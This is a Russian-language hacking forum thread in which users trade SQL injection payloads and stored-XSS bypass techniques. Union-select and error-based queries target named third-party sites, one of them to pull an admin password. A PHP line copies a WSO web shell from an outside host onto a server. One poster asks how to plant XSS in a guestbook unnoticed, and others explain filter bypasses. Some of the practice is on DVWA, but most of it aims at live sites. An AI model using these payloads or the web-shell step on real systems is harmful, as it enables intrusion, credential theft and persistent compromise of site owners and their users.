можно попытаться обойти авторизацию, с помощью or 1=1,но тут нужно смотреть на примере. и ещё - я на 90% уверен, что на сайте есть инъекция и в get запросе.
HElp SQli http://www.adult-images.net/view_comments.php?gal=-455' /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -
Code: http://www.adult-images.net/view_comments.php?gal=455'+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+1 Ctrl+A Code: Duplicate entry 'COLLATIONS1' for key 'group_key'
Скажите , меня интересует такой вопрос : пока я в гостевой ищю активную xss я вписываю разные вещи в поля чтобы найти xss, а редактировать свои сообщения нельзя , то даже когда я найду активную xss то админ гостевой зайдет и увидит кучу разных подозрительных сообщений которые я писал чтобы найти xss и прикроет дырку, и я не смогу этим ничего сделать. И даже пользователи что то заподозрят. Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку. limit+0,1 при выводе логина, ты скорее всего упустил.
Code: admin'or+1+and(select+1+from(select+count(*),concat((select+password+from+cosm_users+where+login='admin'),floor(rand(0)*2))x+from+information_schema.table s+group+by+group+by+x)a)--+a Др. вариантов не вижу. -- Помогите и мне! Как вывести таблицы: Code: http://www.ozerna[notforgoogle]ya42.ru/credit/form/LADA/Priora%204D/**/14'-9999.9+union+select+1,2,3,version(),5,6,7--+f "_" заменяет на пробел кажется или я что-то не так делаю?
Для начала написать любое сообщение и определить, где оно выводится на странице. 1) Если вне HTML-тегов, достаточно проверить фильтрацию символа <. 2) Текст выводится в параметре тега внутри кавычек. Надо проверить фильтрацию кавычки соответствующего типа. Экранирование кавычки допустимо, от XSS оно не защищает. 2.1) Кавычка фильтруется, но параметр тега используется JS-кодом, в том числе обработчиками событий. Проверить &, #, ;. 3) Внутри переменной JS. Проверить кавычку соответствующего типа. Экранирование кавычки не позволит выполнить XSS. Если кавычка фильтруется, проверить < и / 3.1) Кавычка, < и/или / фильтруются, но содержимое выводится на страницу, например через document.write(). Достаточно проверки символа \ Вставить один символ в сообщение, не вызвав подозрений, очень просто. Но делать это нужно так, чтобы сообщение не искажало вид страницы в случае наличия уязвимости.
M_script большое тебе спасибо за отзыв, я его перечитал наверное раз 10 и я понял следущее но не уверен что я правильно все понял. 1)Ты имеешь виду если собшение обычное без добавок html то надо написать <gsdgs> 2)Если то что я написал в кавычках осталось в исходном коде то нашел xss , если заменилось то всеравно может быть xss , хоть в статье для новичков я читал что если кавычки заменились то это облом. 2.1) если в исходном коде пусто то проверить символы < и > 3)Потом в скрипте с алертом вместо <> вписать < , > , если скрипт напишется в сообщении значит есть xss , да он не выполняется но все же будут видеть то что я написал. И если вмето замененых кавычек появятся обычные значит пробовать вписать скрипт с обычными кавычками. 3.1) Если в скрипте фильтруются < и / то проверить \ , но это я не понял потому что не знаю что мне дает символ \ , можешь расказать пожалуйста как его использовать. И если \ нет в исходном коде то это облом. Я вообще тебя правильно понял? И это же получается не одно сообщение или подругому никак? Спасибо.
Примеры: 1) Символы (, ), = никто фильтровать не будет. Закрывать тег необязательно. Если проходит <, используем такой вариант: YWxlcnQoJ1hTUycp - alert('XSS') в base64. 2) Даже если кавычка экранируется 2.1) В зависимости от функции-обрабочика может вообще не потребоваться обход фильтров. Но если какая-либо фильтрация мешает, можно использовать хтмл-сущности символов. В myfunction() содержимое value передается как alert("test"). 3) Закрываем строку, вставляем свой код. Тег script можно закрыть даже внутри строки. 3.1) Это лишь несколько общих примеров. Тема достаточно обширная и об этом можно написать еще много всего. Расположение текста в коде можно посмотреть по чужим текстам, если до тебя кто-то уже писал на странице. Ни разу не пробовал проходить DVWA
Еслить можно выполнять код + папки на запись, то какая проблема? PHP: copy("http://site.ltd/wso.txt","/home/www/123.php"); P.S. В wp-config.php пасс хранится в открытом виде.
M_script спасибо, я не много что понял из твоего последнего сообщения но ты меня навел на мысль что может уже кто то использовал html-теги до меня как <div> и мне всего лишь надо заглянуть в source странички и проверить где возможна xss. Но , я тренируюсь в DVWA и там в уровне low проходит <script>alert()</script> , а вот в уровне medium не проходит и надо писать <sc<script>ript>alert()</sc</script>ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ? И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать ) Ты за несколько сообщений уже многому меня научил чего я абсолютно не знал и не догадывался. Спасибо.
Я уже писал выше, там нужно Code: <sc<script>ript>alert()</script> потому что вырезает только <script> а </script> не трогает. Именно в том случае xss нет. Но возможность обойти htmlspecialchars() есть только в том случае если уязвимый параметр выводится в ссылке и кодировка файла UTF-7.